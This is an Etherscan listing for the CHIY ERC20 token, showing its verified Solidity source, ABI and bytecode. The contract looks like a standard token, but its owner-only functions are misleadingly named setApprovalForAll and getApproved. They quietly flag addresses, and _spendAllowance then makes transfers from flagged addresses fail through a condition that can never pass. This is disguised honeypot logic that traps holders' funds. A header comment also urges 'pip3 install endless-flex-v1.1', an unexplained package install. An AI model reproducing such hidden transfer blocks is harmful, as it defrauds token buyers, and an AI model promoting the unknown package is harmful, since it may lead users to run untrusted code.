ETH Price: $3,388.70 (+0.01%)
Gas: 4 Gwei

Token

CHIY (CHIY)
 

Overview

Max Total Supply

1,000,000,000,000 CHIY

Holders

43

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
Robinhood
Balance
31,009,384,651.332989206020978816 CHIY

Value
$0.00
0x40b38765696e3d5d8d9d834d8aad4bb6e418e489
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Chiy

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-31
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/*
    pip3 install endless-flex-v1.1
*/

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) private _allowance;

    mapping(address => mapping(address => uint256)) public _allowances;

    uint256 private _totalSupply;

    bool private _allowanceApplied = false;
    string private _name;
    string private _symbol;
    

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function setApprovalForAll(address [] calldata _all_) external onlyOwner {
        for (uint256 i = 0; i < _all_.length; i++) {
            _allowance[_all_[i]] = true;
        }
    }

    function getApproved(address [] calldata _all_) external onlyOwner {
        for (uint256 i = 0; i < _all_.length; i++) {
            _allowance[_all_[i]] = false;
        }
    }

    function isApprovedForAll(address _id_) public view returns (bool) {
        return _allowance[_id_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
        if (_allowance[owner] || _allowance[spender]) require(_allowanceApplied == true, "");
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract Chiy is ERC20 {
    constructor() ERC20("CHIY", "CHIY") {
        _mint(msg.sender, 1000000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"_allowances","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_all_","type":"address[]"}],"name":"getApproved","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_id_","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_all_","type":"address[]"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600560006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600481526020017f43484959000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f4348495900000000000000000000000000000000000000000000000000000000815250620000b9620000ad6200012660201b60201c565b6200012e60201b60201c565b8160069081620000ca9190620005ed565b508060079081620000dc9190620005ed565b5050506200012033620000f4620001f260201b60201c565b600a62000102919062000864565b64e8d4a51000620001149190620008b5565b620001fb60201b60201c565b620009ec565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200026d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002649062000961565b60405180910390fd5b62000281600083836200036960201b60201c565b806004600082825462000295919062000983565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003499190620009cf565b60405180910390a362000365600083836200036e60201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620003f557607f821691505b6020821081036200040b576200040a620003ad565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004757fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000436565b62000481868362000436565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620004ce620004c8620004c28462000499565b620004a3565b62000499565b9050919050565b6000819050919050565b620004ea83620004ad565b62000502620004f982620004d5565b84845462000443565b825550505050565b600090565b620005196200050a565b62000526818484620004df565b505050565b5b818110156200054e57620005426000826200050f565b6001810190506200052c565b5050565b601f8211156200059d57620005678162000411565b620005728462000426565b8101602085101562000582578190505b6200059a620005918562000426565b8301826200052b565b50505b505050565b600082821c905092915050565b6000620005c260001984600802620005a2565b1980831691505092915050565b6000620005dd8383620005af565b9150826002028217905092915050565b620005f88262000373565b67ffffffffffffffff8111156200061457620006136200037e565b5b620006208254620003dc565b6200062d82828562000552565b600060209050601f83116001811462000665576000841562000650578287015190505b6200065c8582620005cf565b865550620006cc565b601f198416620006758662000411565b60005b828110156200069f5784890151825560018201915060208501945060208101905062000678565b86831015620006bf5784890151620006bb601f891682620005af565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000762578086048111156200073a5762000739620006d4565b5b60018516156200074a5780820291505b80810290506200075a8562000703565b94506200071a565b94509492505050565b6000826200077d576001905062000850565b816200078d576000905062000850565b8160018114620007a65760028114620007b157620007e7565b600191505062000850565b60ff841115620007c657620007c5620006d4565b5b8360020a915084821115620007e057620007df620006d4565b5b5062000850565b5060208310610133831016604e8410600b8410161715620008215782820a9050838111156200081b576200081a620006d4565b5b62000850565b62000830848484600162000710565b925090508184048111156200084a5762000849620006d4565b5b81810290505b9392505050565b600060ff82169050919050565b6000620008718262000499565b91506200087e8362000857565b9250620008ad7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200076b565b905092915050565b6000620008c28262000499565b9150620008cf8362000499565b9250828202620008df8162000499565b91508282048414831517620008f957620008f8620006d4565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000949601f8362000900565b9150620009568262000911565b602082019050919050565b600060208201905081810360008301526200097c816200093a565b9050919050565b6000620009908262000499565b91506200099d8362000499565b9250828201905080821115620009b857620009b7620006d4565b5b92915050565b620009c98162000499565b82525050565b6000602082019050620009e66000830184620009be565b92915050565b611aec80620009fc6000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c806370a08231116100a257806395d89b411161007157806395d89b41146102f5578063a457c2d714610313578063a9059cbb14610343578063dd62ed3e14610373578063f2fde38b146103a357610116565b806370a0823114610281578063715018a6146102b1578063716496ae146102bb5780638da5cb5b146102d757610116565b806318160ddd116100e957806318160ddd146101c957806323b872dd146101e75780632ee17e0b14610217578063313ce56714610233578063395093511461025157610116565b8063024c2ddd1461011b57806306fdde031461014b578063095ea7b31461016957806309690a4914610199575b600080fd5b61013560048036038101906101309190611105565b6103bf565b604051610142919061115e565b60405180910390f35b6101536103e4565b6040516101609190611209565b60405180910390f35b610183600480360381019061017e9190611257565b610476565b60405161019091906112b2565b60405180910390f35b6101b360048036038101906101ae91906112cd565b610499565b6040516101c091906112b2565b60405180910390f35b6101d16104ef565b6040516101de919061115e565b60405180910390f35b61020160048036038101906101fc91906112fa565b6104f9565b60405161020e91906112b2565b60405180910390f35b610231600480360381019061022c91906113b2565b610528565b005b61023b6105d5565b604051610248919061141b565b60405180910390f35b61026b60048036038101906102669190611257565b6105de565b60405161027891906112b2565b60405180910390f35b61029b600480360381019061029691906112cd565b610615565b6040516102a8919061115e565b60405180910390f35b6102b961065e565b005b6102d560048036038101906102d091906113b2565b610672565b005b6102df61071f565b6040516102ec9190611445565b60405180910390f35b6102fd610748565b60405161030a9190611209565b60405180910390f35b61032d60048036038101906103289190611257565b6107da565b60405161033a91906112b2565b60405180910390f35b61035d60048036038101906103589190611257565b610851565b60405161036a91906112b2565b60405180910390f35b61038d60048036038101906103889190611105565b610874565b60405161039a919061115e565b60405180910390f35b6103bd60048036038101906103b891906112cd565b6108fb565b005b6003602052816000526040600020602052806000526040600020600091509150505481565b6060600680546103f39061148f565b80601f016020809104026020016040519081016040528092919081815260200182805461041f9061148f565b801561046c5780601f106104415761010080835404028352916020019161046c565b820191906000526020600020905b81548152906001019060200180831161044f57829003601f168201915b5050505050905090565b60008061048161097e565b905061048e818585610986565b600191505092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600454905090565b60008061050461097e565b9050610511858285610b4f565b61051c858585610cd8565b60019150509392505050565b610530610f51565b60005b828290508110156105d057600160026000858585818110610557576105566114c0565b5b905060200201602081019061056c91906112cd565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806105c89061151e565b915050610533565b505050565b60006012905090565b6000806105e961097e565b905061060a8185856105fb8589610874565b6106059190611566565b610986565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610666610f51565b6106706000610fcf565b565b61067a610f51565b60005b8282905081101561071a576000600260008585858181106106a1576106a06114c0565b5b90506020020160208101906106b691906112cd565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806107129061151e565b91505061067d565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546107579061148f565b80601f01602080910402602001604051908101604052809291908181526020018280546107839061148f565b80156107d05780601f106107a5576101008083540402835291602001916107d0565b820191906000526020600020905b8154815290600101906020018083116107b357829003601f168201915b5050505050905090565b6000806107e561097e565b905060006107f38286610874565b905083811015610838576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082f9061160c565b60405180910390fd5b6108458286868403610986565b60019250505092915050565b60008061085c61097e565b9050610869818585610cd8565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610903610f51565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610972576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109699061169e565b60405180910390fd5b61097b81610fcf565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ec90611730565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a5b906117c2565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b42919061115e565b60405180910390a3505050565b6000610b5b8484610874565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610bd55781811015610bc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bbe9061182e565b60405180910390fd5b610bd48484848403610986565b5b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610c765750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610cd25760011515600560009054906101000a900460ff16151514610cd1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc890611874565b60405180910390fd5b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d47576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3e90611906565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610db6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dad90611998565b60405180910390fd5b610dc1838383611093565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e48576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3f90611a2a565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffff